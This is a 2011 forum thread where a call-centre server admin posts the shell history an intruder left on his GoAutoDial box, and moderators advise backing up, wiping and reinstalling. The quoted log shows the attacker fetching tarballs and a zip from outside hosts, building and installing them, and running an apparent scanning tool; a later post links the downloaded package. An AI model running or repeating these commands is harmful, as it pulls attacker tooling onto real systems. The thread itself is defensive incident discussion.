Hacked ??

General and Support topics relating to ViciDialNow and GoAutoDial ISO installers

Moderators: enjay, williamconley, Op3r, Staydog, gardo, mflorell, MJCoate, mcargile, Kumba, s0lid

Hacked ??

Postby gmcust3 » Fri Sep 16, 2011 3:08 pm

Suddenly I find below few command ran on my server , MUST BE by some hackers.. Now I changed password of root ..but what can be the implications of below commands ?



27 cd /etc/ppp
28 wget gsm-replica.com/allnoscan.tgz
29 tar zxvf allnoscan.tgz
30 cd aastra/
31 wget gsm-replica.com/fork.tgz
32 tar zxvf fork.tgz
33 cd fork
34 perl Makefile.PL
35 make
36 make install
37 cd ..
38 screen
39 cd ../polycom/
40 cp ../aastra/bios.txt bios.txt
41 screen
42 cd /etc/ppp/aastra/
43 vi vuln
44 rm -rf vuln
45 cd ../polycom/
46 vi vuln
47 rm -rf vuln
48 exit
49 ./start b 4
50 wget http://fs03n3.sendspace.com/dl/8f286c2d ... cb4a6/4e70 f0222f326731/n2u07y/e.zip
51 unzip e.zip
52 mv e.txt bios.txt
53 ./start b 4





I see a folder under etc folder as ppp , Can I delete it ?
Last edited by gmcust3 on Fri Sep 16, 2011 3:12 pm, edited 1 time in total.
GoAutoDial CE
VERSION: 2.4-309a
BUILD: 110430-1642
No other software installed on the box.
I've read the manager manual.
gmcust3
 
Posts: 1148
Joined: Sat Oct 24, 2009 1:15 pm

Postby gmcust3 » Fri Sep 16, 2011 3:10 pm

Server was accessed from :

206.125.45.185

95.130.170.231
GoAutoDial CE
VERSION: 2.4-309a
BUILD: 110430-1642
No other software installed on the box.
I've read the manager manual.
gmcust3
 
Posts: 1148
Joined: Sat Oct 24, 2009 1:15 pm

Postby williamconley » Sat Sep 17, 2011 8:36 pm

32 tar zxvf fork.tgz
33 cd fork
34 perl Makefile.PL
35 make
36 make install
wipe your system and reinstall. they have added software to your system and that software could have done ANYTHING while running. you could have extra users, you could be running ip forwarding ... backup, wipe, reinstall, lockdown, restore. iptables whitelist access only.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Postby gmcust3 » Sat Sep 17, 2011 10:31 pm

Can I delete the PPP folder safely ?

Here is the fork file :

http://www.4shared.com/file/gzoJb9Ne/fork.html
GoAutoDial CE
VERSION: 2.4-309a
BUILD: 110430-1642
No other software installed on the box.
I've read the manager manual.
gmcust3
 
Posts: 1148
Joined: Sat Oct 24, 2009 1:15 pm

Postby williamconley » Sat Sep 17, 2011 10:58 pm

the point from my earlier post is this:

their software, once running, could have done ANYTHING. it could have installed a rootkit, it could have changed your TTY settings to make anything with the word "free" in it Green ... seriously. Unless you find out what it did, anyone telling you that you can safely delete anything or ...? is "hoping" they are right, but the reality of the matter is that they logged into your system and ran an external application which they downloaded. If the app is still there, you could look it over. If it's an executable ... good luck with that. And remember they could have changed it after running it to cover their tracks.

Wipe it and start over (back up first!!!). Back up NOW. Especially your data.

Of course, you could just delete everything they created and "hope" ... but the results of that could be several thousand dollars in calls to australia on Wednesday at 4AM. In an hour.

And seriously, *I* have no intention of looking at something that someone like this uploaded into your server. I'm crazy, not ...
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Postby gardo » Mon Sep 19, 2011 3:00 pm

I agree with William. Do a clean reinstall. Safer and faster. :wink:
http://goautodial.com
Empowering the next generation contact centers
gardo
 
Posts: 1926
Joined: Fri Sep 15, 2006 10:24 am
Location: Manila, 1004

Postby williamconley » Mon Sep 19, 2011 5:00 pm

And I'm not saying fighting a virus isn't great sport ... but is it worth the risk and effort (both)?

10 years or so ago when most of the country (windows users anyway) got hit with that supervirus (ok, lots of places did), I got a heads-up call from a network admin that she had "a problem" with her network, and I should check ours, too. Turns out servers across the known universe were being hit. Her company called in "the pros", and my boss said "handle it, but it comes out of YOUR department's budget".

Her company's "Pro's" battled the virus, blew about $8000, lost that day's data, wiped all the workstations and servers clean and reinstalled all their software. Bear in mind, that we both had Norton installed. And updated.

*I* on the other hand (after learning that when the Pro's began to try to delete files and fight the virus ... it began do delete data and essential system files!), did that thing many forget in that moment. I initated a backup, and told everyone on the sales floor and admin offices to Keep Paper Copies of everything today.

As soon as the backup completed, I broke our connection to the Net (pissed off everyone, of course, but since we didn't have VOIP, it was not a big deal).

As soon as business closed for the night, I did another backup, and once again pulled out the DAT tapes as soon as they were done for storage (hoping they would not be corrupt).

Then I shut off every computer in the office by pulling the plug, including the servers.

Then I turned on the net.

Then I booted every machine from a Live Desktop (Demo!) CD one at a time, starting with the domain controller ... and scrubbed every computer in the office with "Housecall" and every other virus checker I could find until each one scanned clean.

Then I loaded up the new virus rules into Norton (apparently there was a new version for some reason) ... and restored the data and immediately scanned again.

*Poof* no loss of servers or systems or $8000 (but I worked well into the morning). Nobody took a pay cut. (I got the next day off due to unconsciousness.)

You ready to try to do that without Norton or Housecall? There are rootkit detectors for Linux. It should only take a few hours. Maybe.

Or you can just back up your mysql data (text file, no virus) and reinstall, then restore your data.

Up to you, though. Obviously.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)


Return to ViciDialNow - GoAutoDial

Who is online

Users browsing this forum: No registered users and 39 guests